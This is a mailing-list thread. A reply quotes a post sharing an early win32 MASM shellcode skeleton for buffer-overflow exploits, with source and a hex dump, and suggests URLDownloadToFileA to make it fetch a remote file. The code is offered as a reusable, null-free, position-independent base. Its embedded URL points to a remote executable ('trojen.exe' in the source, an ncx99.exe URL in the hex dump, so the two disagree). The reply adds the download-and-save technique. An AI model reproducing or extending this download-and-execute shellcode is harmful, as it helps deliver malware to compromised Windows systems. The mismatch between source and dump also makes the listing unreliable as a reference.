Re: Small win32 shellcode demo

[andreas junestam <andreas.junestam () defcom com>]

Haven't had time to check through your code yet, so you might already
know this: To make everything even smaller there is a dll called
urlmon.dll which contains a function named URLDownloadToFileA. It does
just what it says: Downloads and saves a file from the web in one call.
I used this in my first win32 exploit and it works perfect.. :)

/andreas

"Enrique A. Compañ Gzz." wrote:
> This is an ultra early demo of the new shellcode I'm developing, designed to
> be fast & small & polymorphic, without
> hard coded values.
>
> I have a previous version of a finished shellcode like this one, I'll
> release it soon...
>
> The Shell Code :
> -----------------------------
>
> This code was developed with masm32.
>
> This is only the base of the shellcode, it can be used to develop your own
> stuff.
>
> Features:
>
> * No need to know the address of our code, no need to have the address in a
> register, no matter what technique
>   you use to exploit the buffer (shellcode in the buffer,  shellcode after
> EIP, jump back... etc)
> * No Nulls
> * Fast & Small
>
> You can even compile this code and run the EXE and it will run and terminate
> normally... (nice ;-))
>
> .386                                                            ; Next time
> we'll be using 586 code..... optimize!
>
> .model flat, stdcall
>
> include \masm32\include\windows.inc
> include \masm32\include\kernel32.inc
> includelib \masm32\lib\kernel32.lib
> include \masm32\include\user32.inc
> includelib \masm32\lib\user32.lib
>
> EXITPROCESS_ADDR            EQU     077E8F32Dh               ; We'll take
> rid of this later ;-)
>
> .code
>
> shell_code_start:
>
>         jmp pi_offset                   ; Jump to call back function
>
> call_back:
>
>         pop esi                         ; ESI now points to the first
> variable (in this case "url"), no matter the size of the "real_code",
>                                             ; ESI will always point there
> real_code_start:
>
>         xor eax, eax                                        ; Our real code
> begins here...
>         push eax
>         mov eax, EXITPROCESS_ADDR
>         call eax                                               ; Do nothing
> but call ExitProcess with a hard-coded value (just for testing)
>
> real_code_end:
>
> pi_offset:
>         call near ptr call_back         ; Return and push the address
>
> vars_start:
>
>         url db "http://box.org/trojen.exe";, 0ffh      ; Just a var
>
> end shell_code_start
>
> 000001F4 0000 0000 0000 0000 0000 0000 EB0B 5E33 C050 B82D
> ..............^3.P.-
> 00000208 F3E8 77FF D0E8 F0FF FFFF 6874 7470 3A2F 2F77 7777
> ..w.......http://www
> 0000021C 2E76 6972 7465 6B77 6562 2E6E 6574 2F6E 6378 3939
> .virtekweb.net/ncx99
> 00000230 2E65 7865 FF00
> .exe..
>
> I've seen variations of this technique... but this one is just fine, it has
> the qualities of a good s-code.
>
> Oh yeah... I recommend you to use TASM32 or MASM32.
>
> BTW I'm collecting some references about this stuff you'll find very
> useful...I'll give them away soon.
>
> My stuff to come...
>
> Enrique A. Compañ Gzz.
> Virtek Labs
>
> Greets: RaiSe, Undersec Team , Net-Search E-Zine, the lists ;-) and all the
> rest...